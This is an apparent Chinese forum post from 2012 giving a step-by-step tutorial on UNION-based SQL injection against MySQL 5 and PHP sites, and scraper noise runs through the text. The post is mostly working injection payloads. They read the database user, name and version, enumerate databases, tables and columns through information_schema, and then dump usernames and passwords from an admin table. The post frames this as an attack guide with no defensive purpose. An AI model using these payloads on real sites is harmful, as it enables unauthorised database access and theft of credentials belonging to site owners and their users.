9 a* T7 W G* w" r9 ^* i" F教程内容:Mysql 5+php 注入
9 Q/ J: S3 [: P9 z7 x0 |
. e% T! _2 N/ P5 S) R
9 q; e$ E w& T. e( m2 I4 e" w$ r5 t7 O5 O7 H
一.查看MYSQL基本信息(库名,版本,用户)
3 ~# ]6 d/ ^& I; z8 I8 `% l# o. Z. r* X
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
- a& y2 Y, v( v
! [# c! _. v# i, p g二.查数据库, e+ Z( P; k: g/ N; P4 o: z
6 j ?3 G7 o& I8 A( s3 ~
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*6 t8 {) n0 I) N; k4 G4 Y0 E
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。+ o/ i# M ]# Z/ ~7 W( H$ N
- x: l2 T! r( t9 l4 ^
三.暴表
+ t, ^# B9 h7 F9 e1 C2 \
5 T; i5 Z, r, c/ u6 Q1 D+ Qand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*0 x, p: p' a+ q; m5 C
0 f' i* i/ @* a* c0 K5 t! I4 Climit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。) w, v! ]- B2 m( X/ l1 A0 a% d
# K: s+ y4 p% A0 o+ u四.暴字段+ D2 M% S- j6 {6 t! A/ M
5 ^4 L; Z- R! x# ^
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*" \2 r" C' C' Y6 b* L' E' X1 O
$ N* s, p, \: ~- e; j- g2 q
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。( A$ C3 _# A1 ^0 C% q: k7 w
+ \, Q8 n9 s3 ?% i9 A2 j3 g+ `( z3 k五.暴数据- x9 J W: {: k) _/ l8 g
+ R1 A! \' E- X0 P) H7 s8 y2 ]
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
2 w) X/ }. r! ]# B7 b1 P; a1 o1 E4 B* t5 s9 D
' w6 o1 Y6 {9 f. D; x J6 B) D
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
6 [$ e$ O0 A/ K( o |
发表于 2012-9-13 16:27:53
收藏
支持
反对